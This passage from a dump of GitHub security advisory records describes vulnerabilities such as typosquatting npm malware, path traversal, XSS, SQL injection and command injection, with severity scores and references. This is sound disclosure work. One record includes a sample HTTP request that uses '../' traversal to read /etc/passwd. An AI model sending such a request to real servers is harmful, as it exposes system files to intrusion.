{'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/A2RRFNTMFYKOTRKD37F5ANMCIO3GGJML/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YIGVQWOA5XXCQXEOOKZX4CDAGLBDRPRX/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SQBCYJUIM5GVCMFUPRWKRZNXMMI5EFA4/', 'https://github.com/opencontainers/distribution-spec/commit/ac28cac0557bcd3084714ab09f9f2356fe504923', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4334HT7AZPLWNYHW4ARU6JBUF3VZJPZN/', 'https://github.com/advisories/GHSA-mc8v-mgrf-8f4m', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41190', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RZTO6N55WHKHIZI4IMLY2QFBPMVTAERM/', 'http://www.openwall.com/lists/oss-security/2021/11/19/10', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4OJ764CKKCWCVONHD4YXTGR7HZ7LRUV/', 'https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3TUZNDAH2B26VPBK342UC3BHZNLBUXGX/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DX63GRWFEI5RVMYV6XLMCG4OHPWZML27/'}
null
GHSA
GHSA-9xww-fwh9-95c5
Malicious Package in uglyfi-js
Version 3.4.6 of `uglyfi-js` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T21:56:46Z
2020-09-02T21:43:59Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/911', 'https://github.com/advisories/GHSA-9xww-fwh9-95c5'}
null
GHSA
GHSA-5854-jvxx-2cg9
Denial of Service in subtext
Versions of `subtext` >=4.1.0 are vulnerable to Denial of Service. The Content-Encoding HTTP header parser has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. Because hapi rethrows system errors (as opposed to catching expected application errors), the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services. ## Recommendation This package is deprecated and is now maintained as `@hapi/subtext`. Please update your dependencies to use `@hapi/subtext`.
null
2020-09-03T15:46:57Z
2020-09-03T15:46:57Z
HIGH
0
null
{'https://github.com/advisories/GHSA-5854-jvxx-2cg9', 'https://www.npmjs.com/advisories/1478'}
null
GHSA
GHSA-9cxh-gqpx-qc5m
Credential Disclosure in System.DirectoryServices.Protocols
Microsoft is releasing this security advisory to provide information about a vulnerability in .NET. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A Information Disclosure vulnerability exists in .NET where System.DirectoryServices.Protocols.LdapConnection may send credentials in plain text on Linux. ### Patches Any .NET application that uses `System.DirectoryServices.Protocols` with a vulnerable version listed below on system based on Linux. Package name | Vulnerable versions | Secure versions ------------ | ---------------- | ------------------------- System.DirectoryServices.Protocols | 5.0.0 | 5.0.1 ### Other Details - Announcement for this issue can be found at dotnet/announcements#202 - An Issue for this can be found at https://github.com/dotnet/runtime/issues/60301 - MSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41355
{'CVE-2021-41355'}
2022-02-08T20:42:45Z
2021-10-12T17:49:25Z
MODERATE
5.7
{'CWE-200'}
{'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41355', 'https://github.com/dotnet/runtime/issues/60301', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41355', 'https://github.com/advisories/GHSA-9cxh-gqpx-qc5m', 'https://github.com/dotnet/runtime/security/advisories/GHSA-9cxh-gqpx-qc5m', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41355', 'https://www.oracle.com/security-alerts/cpujan2022.html'}
null
GHSA
GHSA-hr3h-x6gq-rqcp
Cross site scripting via HTML attributes in the back end
### Impact It is possible for untrusted users to inject malicious code into HTML attributes in the back end, which will be executed both in the element preview (back end) and on the website (front end). Installations are only affected if there are untrusted back end users who have the rights to modify HTML fields (e.g. TinyMCE). ### Patches Update to Contao 4.4.56, 4.9.18 or 4.11.7 ### Workarounds Disable all fields that allow HTML for untrusted back end users or disable the login for these users. ### References https://contao.org/en/security-advisories/cross-site-scripting-via-html-attributes-in-the-back-end.html ### For more information If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose). ### Credits Thanks to Mikhail Khramenkov and Moritz Vondano for reporting this security issue.
{'CVE-2021-35955'}
2022-04-19T19:03:05Z
2021-08-25T14:45:01Z
MODERATE
5.9
{'CWE-79'}
{'https://github.com/advisories/GHSA-hr3h-x6gq-rqcp', 'https://github.com/contao/contao/security/advisories/GHSA-hr3h-x6gq-rqcp', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35955', 'https://contao.org/en/news/contao-4-9-16-and-4-11-5-are-available.html'}
null
GHSA
GHSA-79p8-4cwq-rhqh
Directory Traversal in jn_jj_server
Affected versions of `jn_jj_server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16210'}
2021-01-08T21:05:59Z
2018-07-23T20:40:07Z
HIGH
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16210', 'https://nodesecurity.io/advisories/424', 'https://www.npmjs.com/advisories/424', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/jn_jj_server', 'https://github.com/advisories/GHSA-79p8-4cwq-rhqh'}
null
GHSA
GHSA-4w5x-x539-ppf5
Incorrect handling of credential expiry by NATS Server
## Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the <https://github.com/nats-io/jwt> library had an API which encouraged misuse and an `IsRevoked()` method which misused its own API. A new `IsClaimRevoked()` method has correct handling and the nats-server has been updated to use this. The old `IsRevoked()` method now always returns true and other client code will have to be updated to avoid calling it. The CVE identifier should cover any application using the old JWT API, where the nats-server is one of those applications. ## Affected versions #### JWT library * all versions prior to 1.1.0 * fixed after nats-io/jwt PR 103 landed (2020-10-06) #### NATS Server * Version 2 prior to 2.1.9 + 2.0.0 through and including 2.1.8 are vulnerable. * fixed with nats-io/nats-server PRs 1632, 1635, 1645 ## Impact Time-based credential expiry did not work. ## Workaround Have credentials which only expire after fixes can be deployed. ## Solution Upgrade the JWT dependency in any application using it. Upgrade the NATS server if using NATS Accounts.
{'CVE-2020-26892'}
2022-02-11T23:42:49Z
2022-02-11T23:42:20Z
HIGH
5.9
{'CWE-798'}
{'https://github.com/advisories/GHSA-4w5x-x539-ppf5', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26892', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VT67XCLIIBYRT762SVFBYFFTQFVSM3SI/', 'https://advisories.nats.io/CVE/CVE-2020-26892.txt', 'https://github.com/nats-io/jwt/security/advisories/GHSA-4w5x-x539-ppf5', 'https://github.com/nats-io/nats-server/commit/1e08b67f08e18cd844dce833a265aaa72500a12f', 'https://github.com/nats-io/nats-server/commits/master', 'https://www.openwall.com/lists/oss-security/2020/11/02/2'}
null
GHSA
GHSA-c43q-5hpj-4crv
Local information disclosure via system temporary directory
## Impact Eclipse Jersey 2.28 - 2.33 and Eclipse Jersey 3.0.0 - 3.0.1 contains a local information disclosure vulnerability. This is due to the use of the `File.createTempFile` which creates a file inside of the system temporary directory with the permissions: `-rw-r--r--`. Thus the contents of this file are viewable by all other users locally on the system. As such, if the contents written is security sensitive, it can be disclosed to other local users. ## Workaround This issue can be mitigated by manually setting the `java.io.tmpdir` system property when launching the JVM. ## Patches Jersey 2.34 and 3.0.2 forward sets the correct permissions on the temporary file created by Jersey. ### References - https://github.com/eclipse-ee4j/jersey/pull/4712 - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html) - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html) ## Similar Vulnerabilities Similar, but not the same: - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp - Google Guava - https://github.com/google/guava/issues/4011 - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824 - Eclipse Jetty - https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6 --- Original Disclosure: > Hello Jersey Security Team, > > Utilizing a custom CodeQL query written as a part of the [GitHub Security Lab](https://securitylab.github.com/) [Bug Bounty program](https://securitylab.github.com/bounties), I've unearthed a local temporary file information disclosure vulnerability. > > You can see the custom CodeQL query utilized here: > https://lgtm.com/query/8831016213790320486/ > > This particular vulnerability exists because on unix-like systems (not including modern versions of MacOS) the system temporary directory is shared between all users. As such, failure to correctly set file permissions and/or verify exclusive creation of directories can lead to either local information disclosure, or local file hijacking by another user. > > This vulnerability impacts the following locations in this project's source: > > - https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/core-common/src/main/java/org/glassfish/jersey/message/internal/FileProvider.java#L64-L73 > - https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/media/multipart/src/main/java/org/glassfish/jersey/media/multipart/internal/FormDataParamValueParamProvider.java#L202-L208 > > This vulnerability exists because of the vulnerability in the `Utils.createTempFile`: > > https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/core-common/src/main/java/org/glassfish/jersey/message/internal/Utils.java#L42-L53 > > This is because `File.createTempFile` creates a file inside of the system temporary directory with the permissions: `-rw-r--r--`. Thus the contents of this file are viewable by all other users locally on the system. > > If there is sensitive information written to these files, it is disclosed to other local users on this system. > > The fix for this vulnerability is to use the `Files` API (instead of the `File` API) to create temporary files/directories as this new API correctly sets the posix file permissions.
{'CVE-2021-28168'}
2022-04-22T15:48:58Z
2021-04-23T16:55:01Z
MODERATE
6.2
{'CWE-732', 'CWE-379', 'CWE-378'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/r96658b899fcdbf04947257d201dc5a0abdbb5fb0a8f4ec0a6c15e70f@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rc6221670de35b819fe191e7d8f2d17bc000549bd554020cec644b71e@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rc288874c330b3af9e29a1a114c5e0d24fff7a79eaa341f551535c8c0@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r4066176a7352e021d7a81af460044bde8d57f40e98f8e4a31923af3a@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/ra3290fe51b4546fac195724c4187c4cb7fc5809bc596c2f7e97606f4@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r280438f7cb4b3b1c9dfda9d7b05fa2a5cfab68618c6afee8169ecdaa@%3Ccommits.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r42fef440487a04cf5e487a9707ef5119d2dd5b809919f25ef4296fc4@%3Cjira.kafka.apache.org%3E', 'https://github.com/advisories/GHSA-c43q-5hpj-4crv', 'https://github.com/eclipse-ee4j/jersey/pull/4712', 'https://lists.apache.org/thread.html/r454f38e85db149869c5a92c993c402260a4f8599bf283f6cfaada972@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rdff6939e6c8dd620e20b013d9a35f57d42b3cd19e1d0483d85dfa2fd@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28168', 'https://lists.apache.org/thread.html/ra2722171d569370a9e15147d9f3f6138ad9a188ee879c0156aa2d73a@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rd54b42edccc1b993853a9c4943a9b16db763f5e2febf6e64b7d0fe3c@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r305fb82e5c005143c1e2ec986a19c0a44f42189ab2580344dc955359@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r6dadc8fe82071aba841d673ffadf34728bff4357796b1990a66e3af1@%3Ccommits.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/ra3d7cd37fc794981a885332af2f8df0d873753380ea19935d6d847fc@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rafc3c4cee534f478cbf8acf91e48373e291a21151f030e8132662a7b@%3Cjira.kafka.apache.org%3E', 'https://github.com/eclipse-ee4j/jersey/security/advisories/GHSA-c43q-5hpj-4crv'}
null
GHSA
GHSA-968f-66r5-5v74
HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers (Follow-up)
### Impact The patches introduced to fix https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 were not complete and still would allow an attacker to smuggle requests/split a HTTP request with invalid data. This updates the existing CVE with ID: CVE-2019-16789 ### Patches Waitress version 1.4.2 has been updated to now validate HTTP headers better to avoid the issue, completely fixing all known issues with whitespace. ### Workarounds There are no work-arounds, upgrading to Waitress 1.4.2 is highly recommended. ### References See https://github.com/Pylons/waitress/security/advisories/GHSA-m5ff-3wj3-8ph4 for more information on the security issue. ### For more information If you have any questions or comments about this advisory: * open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related) * email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)
{'CVE-2019-16789'}
2022-04-25T23:09:38Z
2020-01-06T18:44:21Z
HIGH
7.1
{'CWE-444'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16789', 'https://github.com/Pylons/waitress/security/advisories/GHSA-968f-66r5-5v74', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/', 'https://github.com/github/advisory-review/pull/14604', 'https://github.com/Pylons/waitress/commit/11d9e138125ad46e951027184b13242a3c1de017', 'https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/', 'https://access.redhat.com/errata/RHSA-2020:0720', 'https://github.com/advisories/GHSA-968f-66r5-5v74'}
null
GHSA
GHSA-ff5x-w9wg-h275
Holder can generate proof of ownership for credentials it does not control in vp-toolkit
### Impact The [`verifyVerifiablePresentation()`](https://github.com/rabobank-blockchain/vp-toolkit/blob/master/src/service/signers/verifiable-presentation-signer.ts#L97) method check the cryptographic integrity of the Verifiable Presentation, but it does not check if the [`credentialSubject.id`](https://github.com/rabobank-blockchain/vp-toolkit-models/blob/develop/src/model/verifiable-credential.ts#L150) DID matches the signer of the VP proof. The **verifier** is impacted by this vulnerability. ### Patches Patch will be available in version 0.2.2. ### Workarounds - Compute the address out of the `verifiablePresentation.proof.n.verificationMethod` using `getAddressFromPubKey()` from `crypt-util@0.1.5` and match it with the `credentialSubject.id` address from the credential. ### References [Github issue](https://github.com/rabobank-blockchain/vp-toolkit/issues/14) ### For more information If you have any questions or comments about this advisory: * Discuss in the existing [issue](https://github.com/rabobank-blockchain/vp-toolkit/issues/14) * [Contact me](https://github.com/rabomarnix)
null
2020-03-06T01:15:46Z
2020-03-06T01:15:46Z
HIGH
0
null
{'https://github.com/rabobank-blockchain/vp-toolkit/commit/18a7db84d3265c6ffa10ef63eb37ae1bd4ba192b', 'https://github.com/advisories/GHSA-ff5x-w9wg-h275', 'https://github.com/rabobank-blockchain/vp-toolkit/issues/14', 'https://github.com/rabobank-blockchain/vp-toolkit/security/advisories/GHSA-ff5x-w9wg-h275'}
null
GHSA
GHSA-89gc-6cw6-4vch
Spark allows remote attackers to read arbitrary files via a .. (dot dot) in the URI
Directory traversal vulnerability in Spark 2.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
{'CVE-2016-9177'}
2022-04-26T18:36:08Z
2018-10-04T19:53:35Z
HIGH
7.5
{'CWE-22'}
{'https://access.redhat.com/errata/RHSA-2017:0868', 'https://github.com/perwendel/spark/issues/700', 'https://nvd.nist.gov/vuln/detail/CVE-2016-9177', 'http://www.securityfocus.com/bid/94218', 'https://github.com/advisories/GHSA-89gc-6cw6-4vch', 'http://seclists.org/fulldisclosure/2016/Nov/13'}
null
GHSA
GHSA-f9cv-665r-275h
Prototype Pollution in merge-change
All current versions of package merge-change are vulnerable to Prototype Pollution via the utils.set function.
{'CVE-2021-23421'}
2021-09-01T18:36:01Z
2021-09-01T18:36:01Z
CRITICAL
9.8
{'CWE-915'}
{'https://snyk.io/vuln/SNYK-JS-MERGECHANGE-1310985', 'https://github.com/advisories/GHSA-f9cv-665r-275h', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23421', 'https://github.com/VladimirShestakov/merge-change/blob/9901f145e06158f284f52de42e6ba5b0f702fb65/utils.js#L89-L123'}
null
GHSA
GHSA-gvff-25cc-4f66
Path Traversal in restify-swagger-jsdoc
Versions of `restify-swagger-jsdoc` prior to 3.2.1 are vulnerable to Path Traversal. The package fails to properly sanitize URLs, which may allow attackers to access server files outside the `swagger-ui` folder by using relative paths. ## Recommendation Upgrade to version 3.2.1 or later.
null
2021-09-28T21:56:34Z
2020-09-03T17:15:56Z
HIGH
0
{'CWE-22'}
{'https://github.com/advisories/GHSA-gvff-25cc-4f66', 'https://www.npmjs.com/advisories/1037'}
null
GHSA
GHSA-rvpq-5xqx-pfpp
High severity vulnerability that affects rails
Ruby on Rails before 1.1.5 allows remote attackers to execute Ruby code with "severe" or "serious" impact via a File Upload request with an HTTP header that modifies the LOAD_PATH variable, a different vulnerability than CVE-2006-4112.
{'CVE-2006-4111'}
2021-09-20T14:44:40Z
2017-10-24T18:33:38Z
HIGH
0
{'CWE-94'}
{'http://www.securityfocus.com/bid/19454', 'https://github.com/advisories/GHSA-rvpq-5xqx-pfpp', 'http://secunia.com/advisories/21466', 'http://secunia.com/advisories/21749', 'https://nvd.nist.gov/vuln/detail/CVE-2006-4111', 'http://securitytracker.com/id?1016673', 'http://weblog.rubyonrails.org/2006/8/9/rails-1-1-5-mandatory-security-patch-and-other-tidbits', 'http://www.gentoo.org/security/en/glsa/glsa-200608-20.xml', 'http://www.vupen.com/english/advisories/2006/3237', 'http://www.novell.com/linux/security/advisories/2006_21_sr.html', 'http://blog.koehntopp.de/archives/1367-Ruby-On-Rails-Mandatory-Mystery-Patch.html'}
null
GHSA
GHSA-gm8g-xhh8-rmwr
Prototype Pollution in doc-path
This affects the package doc-path before 2.1.2.
{'CVE-2020-7772'}
2021-05-10T19:17:25Z
2021-05-10T19:17:25Z
CRITICAL
9.8
{'CWE-1321'}
{'https://github.com/mrodrig/doc-path/blob/stable/src/path.js%23L54', 'https://github.com/advisories/GHSA-gm8g-xhh8-rmwr', 'https://snyk.io/vuln/SNYK-JS-DOCPATH-1011952', 'https://github.com/mrodrig/doc-path/commit/3e2bb168cf303bffcd7fae5f8d05e5300c1541c7', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7772'}
null
GHSA
GHSA-h9jc-284h-533g
Context isolation bypass via contextBridge in Electron
### Impact Apps using both `contextIsolation` and `contextBridge` are affected. This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions. ### Workarounds There are no app-side workarounds, you must update your Electron version to be protected. ### Fixed Versions * `9.0.0-beta.21` * `8.2.4` * `7.2.4` ### For more information If you have any questions or comments about this advisory: * Email us at [security@electronjs.org](mailto:security@electronjs.org)
{'CVE-2020-4077'}
2021-01-07T23:48:29Z
2020-07-07T00:01:10Z
HIGH
7.7
{'CWE-501'}
{'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824', 'https://github.com/electron/electron/commit/b8e347709245d2dc5640fbb3044d9b21b4eaa6b0', 'https://github.com/electron/electron/security/advisories/GHSA-h9jc-284h-533g', 'https://nvd.nist.gov/vuln/detail/CVE-2020-4077', 'https://github.com/advisories/GHSA-h9jc-284h-533g'}
null
GHSA
GHSA-vf94-36g5-69v8
Division by zero in TFLite's implementation of `DepthToSpace`
### Impact The implementation of the `DepthToSpace` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7/tensorflow/lite/kernels/depth_to_space.cc#L63-L69): ```cc const int block_size = params->block_size; ... const int input_channels = input->dims->data[3]; ... int output_channels = input_channels / block_size / block_size; ``` An attacker can craft a model such that `params->block_size` is 0. ### Patches We have patched the issue in GitHub commit [106d8f4fb89335a2c52d7c895b7a7485465ca8d9](https://github.com/tensorflow/tensorflow/commit/106d8f4fb89335a2c52d7c895b7a7485465ca8d9). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-29595'}
2021-05-21T14:27:49Z
2021-05-21T14:27:49Z
LOW
2.5
{'CWE-369'}
{'https://github.com/tensorflow/tensorflow/commit/106d8f4fb89335a2c52d7c895b7a7485465ca8d9', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vf94-36g5-69v8', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29595', 'https://github.com/advisories/GHSA-vf94-36g5-69v8'}
null
GHSA
GHSA-5xmj-wm96-fmw8
Moderate severity vulnerability that affects actionpack
Withdrawn, accidental duplicate publish. Directory traversal vulnerability in actionpack/lib/action_dispatch/middleware/static.rb in Action Pack in Ruby on Rails 3.x before 3.2.21, 4.0.x before 4.0.12, 4.1.x before 4.1.8, and 4.2.x before 4.2.0.beta4, when serve_static_assets is enabled, allows remote attackers to determine the existence of files outside the application root via vectors involving a \ (backslash) character, a similar issue to CVE-2014-7818.
null
2021-12-03T14:20:06Z
2018-09-17T21:54:37Z
MODERATE
0
null
{'https://github.com/advisories/GHSA-5xmj-wm96-fmw8', 'https://nvd.nist.gov/vuln/detail/CVE-2014-7829'}
null
GHSA
GHSA-h6gw-r52c-724r
NULL Pointer Dereference and Access of Uninitialized Pointer in TensorFlow
### Impact The [code for boosted trees in TensorFlow](https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/boosted_trees/stats_ops.cc) is still missing validation. This allows malicious users to read and write outside of bounds of heap allocated data as well as trigger denial of service (via dereferencing `nullptr`s or via `CHECK`-failures). This follows after CVE-2021-41208 where these APIs were still vulnerable to multiple security issues. **Note**: Given that the boosted trees implementation in TensorFlow is unmaintained, it is recommend to no longer use these APIs. Instead, please use the downstream [TensorFlow Decision Forests](https://github.com/tensorflow/decision-forests) project which is newer and supports more features. These APIs are now deprecated in TensorFlow 2.8. We will remove TensorFlow's boosted trees APIs in subsequent releases. ### Patches We have patched the known issues in multiple GitHub commits. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range. This should allow users to use existing boosted trees APIs for a while until they migrate to [TensorFlow Decision Forests](https://github.com/tensorflow/decision-forests), while guaranteeing that known vulnerabilities are fixed. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution These vulnerabilities have been reported by Yu Tian of Qihoo 360 AIVul Team and Faysal Hossain Shezan from University of Virginia. Some of the issues have been discovered internally after a careful audit of the APIs.
null
2022-03-23T22:53:23Z
2022-02-09T23:38:36Z
CRITICAL
9.3
{'CWE-476', 'CWE-824'}
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-57wx-m983-2f88', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h6gw-r52c-724r', 'https://github.com/tensorflow/tensorflow/blob/e0b6e58c328059829c3eb968136f17aa72b6c876/tensorflow/core/kernels/boosted_trees/stats_ops.cc', 'https://github.com/advisories/GHSA-h6gw-r52c-724r'}
null
GHSA
GHSA-2gw2-8q9w-cw8p
Ruby-ffi has a DLL loading issue
ruby-ffi version 1.9.23 and earlier has a DLL loading issue which can be hijacked on Windows OS, when a Symbol is used as DLL name instead of a String This vulnerability appears to have been fixed in v1.9.24 and later.
{'CVE-2018-1000201'}
2022-04-26T18:29:59Z
2018-08-31T14:55:43Z
HIGH
7.8
{'CWE-426'}
{'https://github.com/advisories/GHSA-2gw2-8q9w-cw8p', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000201', 'https://github.com/ffi/ffi/commit/e0fe486df0e117ed67b0282b6ada04b7214ca05c', 'https://github.com/ffi/ffi/commit/09e0c6076466b4383da7fa4e13f714311109945a'}
null
GHSA
GHSA-4qq9-rrq6-48ff
Moderate severity vulnerability that affects org.apache.nifi:nifi
The message-page.jsp error page used the value of the HTTP request header X-ProxyContextPath without sanitization, resulting in a reflected XSS attack. Mitigation: The fix to correctly parse and sanitize the request attribute value was applied on the Apache NiFi 1.8.0 release. Users running a prior 1.x release should upgrade to the appropriate release.
{'CVE-2018-17193'}
2021-09-01T18:01:39Z
2018-12-20T22:02:39Z
MODERATE
6.1
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-17193', 'https://nifi.apache.org/security.html#CVE-2018-17193', 'https://github.com/advisories/GHSA-4qq9-rrq6-48ff'}
null
GHSA
GHSA-2fqw-684c-pvp7
An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.
An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.
{'CVE-2020-35213'}
2022-01-04T18:59:03Z
2021-12-17T20:40:50Z
HIGH
8.1
{'CWE-74'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35213', 'https://github.com/advisories/GHSA-2fqw-684c-pvp7', 'https://docs.google.com/presentation/d/1i8tVVGE8z9Rtl9UTwktOJpkZwT4kBVLgIk307qMiw_8/edit?usp=sharing'}
null
GHSA
GHSA-jgm9-xpfj-4fq6
Path traversal in Onionshare
Between September 26, 2021 and October 8, 2021, [Radically Open Security](https://www.radicallyopensecurity.com/) conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund's [Red Team lab](https://www.opentech.fund/labs/red-team-lab/). This is an issue from that penetration test. - Vulnerability ID: OTF-013 - Vulnerability type: Improper Hardening - Threat level: Low ## Description: The filesystem restriction could be hardened and should only allow for pre-defined subfolders. ## Technical description: The Flatpak and Snap configurations allow for read-only access on the whole home folder. The relevant lines in the configuration files are `onionshare/snap/snapcraft.yaml#L20` and `onionshare/flatpak/org.onionshare.OnionShare.yaml#L19` , respectively. The encapsulation of filesystem access via these mechanisms should be restricted to pre-defined folders and not allow for access to (configuration) files outside the Onionshare-specific folders. Sadly Snap does not allow for further restriction to specific folders and therefore cannot be further hardened. By default both frameworks disallow access to hidden folders and therefore reduce the potential impact. ## Impact: An adversary with a primitive that allows for filesystem access from the context of the Onionshare process can access sensitive files in the entire user home folder. This could lead to the leaking of sensitive data. Due to the automatic exclusion of hidden folders, the impact is reduced. ## Recommendation: - Reduce read access in Flatpak configuration.
{'CVE-2022-21693'}
2022-01-21T23:20:19Z
2022-01-21T23:20:19Z
MODERATE
6.3
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-21693', 'https://github.com/onionshare/onionshare/security/advisories/GHSA-jgm9-xpfj-4fq6', 'https://github.com/advisories/GHSA-jgm9-xpfj-4fq6', 'https://github.com/onionshare/onionshare/releases/tag/v2.5'}
null
GHSA
GHSA-m358-g4rp-533r
SQL Injection in Casdoor
The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
{'CVE-2022-24124'}
2022-03-01T18:52:49Z
2022-02-01T00:49:39Z
HIGH
7.5
{'CWE-89'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-24124', 'https://github.com/casdoor/casdoor/commit/5ec0c7a89005819960d8fe07f5ddda13d1371b8c', 'https://github.com/casdoor/casdoor/pull/442', 'https://github.com/advisories/GHSA-m358-g4rp-533r', 'https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1', 'http://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html', 'https://github.com/casdoor/casdoor/issues/439'}
null
GHSA
GHSA-qfxv-qqvg-24pg
OS Command Injection in im-metadata
im-metadata through 3.0.1 allows remote attackers to execute arbitrary commands via the "exec" argument. It is possible to inject arbitrary commands as part of the metadata options which is given to the "exec" function.
{'CVE-2019-10788'}
